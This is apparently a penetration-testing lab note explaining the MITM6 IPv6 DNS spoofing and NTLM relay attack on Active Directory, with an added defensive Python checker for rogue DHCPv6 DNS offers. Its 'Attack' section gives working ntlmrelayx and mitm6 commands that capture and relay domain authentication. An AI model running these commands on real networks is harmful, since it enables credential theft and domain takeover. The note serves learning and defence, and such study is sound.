What is MITM6?

In many Windows environments, IPv6 is enabled by default but not actively used. Because Windows prefers IPv6 over IPv4, an attacker can exploit this by running MITM6 as a rogue DHCPv6 server, which makes domain-joined machines use the attacker's host as their DNS server. The attacker can then answer DNS queries with spoofed responses and redirect authentication requests to their own system. When clients attempt to authenticate to the Domain Controller (DC) via LDAP or SMB, the attacker receives the NTLM authentication and relays it to the DC with NTLMRelayX. If the relay succeeds, the attacker can create a new machine account in the domain and gain persistent access. As further users authenticate across the network, their authentications are intercepted and relayed as well, potentially escalating privileges.

<aside> 💡

Yes, the three attacks—IPv6 DNS Spoofing & NTLM Relay (MITM6), DNS Takeover Attack, and Local DNS Spoofing—are related but distinct in how they operate and their objectives.

1. IPv6 DNS Spoofing & NTLM Relay Attack (MITM6 + NTLMRelayX)

🔹 Goal: Capture and relay NTLM authentication to a Domain Controller to create a machine account or escalate privileges.

🔹 Method: Abuse IPv6 auto-configuration to spoof the DNS server, forcing machines to send authentication requests to an attacker.

🔹 Target: Active Directory authentication (LDAP/SMB) inside a local network.

🔹 Relation to DNS Takeover: It’s a form of local DNS spoofing, but instead of targeting internet domains, it tricks Windows authentication mechanisms.

2. DNS Takeover Attack

🔹 Goal: Gain control over a public domain or subdomain to redirect users or impersonate services.

🔹 Method: Exploit misconfigured, expired, or hijacked DNS records (e.g., subdomain takeover).

🔹 Target: External users or cloud services relying on hijacked domains.

🔹 Relation to IPv6 DNS Spoofing: It’s broader in scope and affects external domains, while MITM6 targets local authentication.

3. Local DNS Spoofing Attack

🔹 Goal: Redirect internal users to malicious sites or services within a network.

🔹 Method: Modify local DNS responses (e.g., using tools like Responder) to fake legitimate internal services.

🔹 Target: Any local network users, often for phishing or credential capture.

🔹 Relation to MITM6 & DNS Takeover:

Summary:

Each attack has overlapping techniques but different objectives and targets. 🚀

</aside>

Attack

Run ntlmrelayx first, then mitm6.

  1. ntlmrelayx

    impacket-ntlmrelayx -6 -t ldaps://192.168.150.128 -wh fakewpad.marvel.local -l lootme

  2. MITM6

    sudo mitm6 -d marvel.local
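From the defender's side, the rogue DHCPv6 server above shows up on the wire as Advertise/Reply messages whose DNS Recursive Name Server option points at a host that is not the organisation's resolver. The following is an added example (not part of these notes or of the mitm6 project): a small Python checker that parses raw DHCPv6 payloads and flags any offered resolver outside an allow-list. The allow-list, DUIDs and sample packets are constructed assumptions.

```python
# Flag DHCPv6 Advertise/Reply messages that push an unauthorised DNS server.
# Feed it the UDP payloads seen on client port 546 (mirror port, pcap, etc.).
# Added example; allow-list and sample packets are constructed, not from the page.
import ipaddress
import struct

ADVERTISE, REPLY = 2, 7            # DHCPv6 message types (RFC 8415)
OPT_SERVERID, OPT_DNS_SERVERS = 2, 23  # option codes: Server DUID, DNS servers

def parse_dhcpv6(payload: bytes) -> dict:
    """Return message type, transaction id and {option_code: [data, ...]}."""
    if len(payload) < 4:
        raise ValueError("short DHCPv6 message")
    msg_type = payload[0]
    xid = int.from_bytes(payload[1:4], "big")
    opts, i = {}, 4
    while i + 4 <= len(payload):             # each option: code(2) len(2) data
        code, length = struct.unpack("!HH", payload[i:i + 4])
        data = payload[i + 4:i + 4 + length]
        if len(data) != length:
            raise ValueError("truncated option %d" % code)
        opts.setdefault(code, []).append(data)
        i += 4 + length
    return {"type": msg_type, "xid": xid, "options": opts}

def dns_servers(msg: dict) -> list:
    """Decode every 16-byte address carried in DNS_SERVERS options."""
    addrs = []
    for data in msg["options"].get(OPT_DNS_SERVERS, []):
        for j in range(0, len(data) - len(data) % 16, 16):
            addrs.append(ipaddress.IPv6Address(data[j:j + 16]))
    return addrs

def rogue_dns_offers(payload: bytes, allowed_dns: set) -> list:
    """Return resolvers offered by an Advertise/Reply that are not allow-listed."""
    msg = parse_dhcpv6(payload)
    if msg["type"] not in (ADVERTISE, REPLY):
        return []                            # Solicit/Request etc. offer nothing
    return [a for a in dns_servers(msg) if a not in allowed_dns]

def build_advertise(xid: int, duid: bytes, dns: list) -> bytes:
    """Build a minimal Advertise so the checker can be exercised offline."""
    body = bytes([ADVERTISE]) + xid.to_bytes(3, "big")
    body += struct.pack("!HH", OPT_SERVERID, len(duid)) + duid
    dns_data = b"".join(ipaddress.IPv6Address(a).packed for a in dns)
    return body + struct.pack("!HH", OPT_DNS_SERVERS, len(dns_data)) + dns_data

ALLOWED_DNS = {ipaddress.IPv6Address("fd00:10::53")}   # constructed allow-list
```

Any non-empty result is worth an alert, since a legitimate DHCPv6 server never hands out a link-local or unknown resolver; the Server DUID option (code 2) parsed alongside it identifies which host sent the offer.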

lootme Folder

Attack Successful (Admin Login Captured)